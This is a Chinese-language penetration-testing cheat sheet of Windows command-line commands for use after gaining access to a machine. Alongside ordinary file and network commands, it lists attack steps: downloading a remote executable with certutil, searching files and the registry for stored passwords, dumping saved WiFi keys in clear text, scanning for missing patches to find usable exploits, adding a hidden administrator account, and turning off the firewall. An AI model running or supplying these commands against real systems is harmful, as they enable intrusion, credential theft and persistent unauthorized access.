如果我有七个小时的时间来砍树，那么我一定会花6个小时来磨我的斧头！

渗透命令：

certutil-----从远程url下载文件

案例:certutil -urlcache -split -f http://baidu.com/test.exe

findstr-----查找文件后缀结果

findstr /s /i "pass" *.py*

reg query HKLM /f password /t REG_SZ /s-----搜集注册表中的各种密码数据

查看有没有开启远程链接，运行下面命令：

REG QUERY "HKEY_LOCAL_macHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

结果：1表示关闭，0表示开启

快速查找未打补丁的exp

systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt

常用命令：

ipconfig/all-----网络配置情况

ipconfig /displayDNS-----查看本地DNS缓存

netsh wlan show profile-----查看连接过的 wifi 名

netsh wlan show profile WiFi-name key=clear 获取 wifi 对应的的密码

query user-----查当前机器中正在线的用户,看管理员在不在

net view------显示域列表/计算机列表

net user------查看当前所有账号，判断域规模

net group-----查看当前域所有的组名

net user bzhack pass /add-----增加用户

net user bzhack /del-----删除用户

net Localgroup-----添加、显示本地组

net localgroup administrators bzhack /add-----将bzhack加入管理员组

net share----- 查看当前机器开启的共享

文件操作：

md-----建文件夹

rd-----删除文件夹

tree-----显示文件夹结构

dir-----显示磁盘目录内容

copy-----复制文件

Xcopy-----copy加强版，复制文件夹

del-----删除文件

ren-----[原文件/夹名][新文件/夹名]修改文件名

type-----查看文本内容

dir /a /s /b d:"*.conf"-----搜索d盘里conf结尾的文件

edit-----文本编辑

type-----显示文件内容

网络命令：

netstat -a----- 列出所有端口

netstat -p----- 显示 PID 和进程名称

netstat -r----- 显示核心路由信息

netstat -at-----列出所有tcp连接

netstat -au-----列出所有ucp连接

netstat -an |find "3389" 查看开启3389端口的信息

netstat -ano | findstr "ESTABLISHED" 查看当前正处于连接状态的端口及ip

netstat -ano | findstr "LISTENING" 查看当前正处于监听状态的端口及ip

其他命令

ver-----查看版本

hostname-----查看机器名

whoami-----查看权限

systeminfo-----查看配置

tasklist-----查看进程

cls-----清屏

net start-----查看开启的服务，比如Terminal Services 远程连接服务

net stop sharedaccess-----关闭防火墙

set-----查看当前机器的环境变量,看有没有我们可以直接利用到的语言环境

fsutil fsinfo drives-----列出当前机器上的所有盘符